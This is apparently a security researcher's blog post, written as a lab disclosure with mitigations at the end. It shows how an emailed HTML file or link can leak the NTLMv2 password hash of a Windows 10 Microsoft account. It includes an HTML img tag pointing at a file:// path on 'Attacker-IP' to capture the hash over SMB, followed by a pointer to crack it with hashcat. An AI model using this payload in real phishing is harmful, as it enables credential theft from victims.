Password hash leak via email attachment
Yesterday I saw a laptop running Windows 10. Nothing special but the user used his Microsoft account in Windows 10. I thought it would interesting to see how it works...Especially because Microsoft pushes users to use a Microsoft account instead of a local account https://www.bleepingcomputer.com/news/microsoft/microsoft-wants-to-do-away-with-windows-10-local-accounts/
Long story short: When a Microsoft account is used in Windows 10 it is possible to get the accounts password hash (and used email address) when a user clicks on a link inside an email or opens a html attachment.
To get the users password hash I basically used the fact that Windows responds to SMB authentication requests using the user´s credentials. Doing it this way the user don´t has to provide credentials for each individual server. The downside is that any server can request authentication and Windows will respond. In enterprise environments mitigations like SMB signing or GPOs (https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-outgoing-ntlm-traffic-to-remote-servers) are in place to prevent Windows leaking the users hash. But these mitigations are not set for home users. Also Windows Defender or the Windows Firewall will not block it.
When a Microsoft account is used in Windows 10, users will not enter a password anymore. Instead the user can use Windows Hello (PIN, Fingerprint and Face) or a physical security key. I focused on the PIN because I saw it on the laptop mentioned before.
In my test lab, I created a Windows 10 VM and linked a Microsoft account to it.
I also created a PIN which will be used at logon (instead of a password).
Next step was to run a SMB server collecting the users NTLMv2 hash. I used https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbserver.py on my Kali machine.
Having the SMB server up and running I "only" had to find a way how the hash can be sent to my SMB server. After a short google search I found this article https://www.securify.nl/blog/living-off-the-land-stealing-netntlm-hashes For me the easiest part was using a html file like this:
<!DOCTYPE html>
<html>
<img src="file://Attacker-IP/somefile.html"/>
</html>
Obviously "file://Attacker-IP/somefile.html" is the interesting part. When a user enters file://Attacker-IP/somefile.html in a browser, the browser will block this request. But when a local file (like file://C:/Folder/file.txt) is opened nothing is blocked... By having a "malicious" html file and link, an attacker can write an email (including a link and/or html attachment) to the victim. When the victim opens the link or attachment the user´s NTLMv2 hash will be sent to the attacker.
* Creating a website containing the above html code does not work with modern browsers; only with Internet Explorer. That´s why I used a local file with the same content (file://Attacker-IP/somefile.html).
So I created an email containing the link and attachment and sent it to the victim (my Windows 10 test VM).
Now the attacker can try to crack the hash to get the users password with tools like hashcat.
I created a proof of concept video
There are many mitigations like SMB signing or restricting NTLM traffic to remote servers, but for me the best and also easiest mitigation is: Don´t use a Microsoft account in Windows 10 and use a strong password! If you don´t want to use a local account change your Microsoft account password. The NTLMv2 hash will still be the hash for the old password so make sure that you don´t use this password for other services.
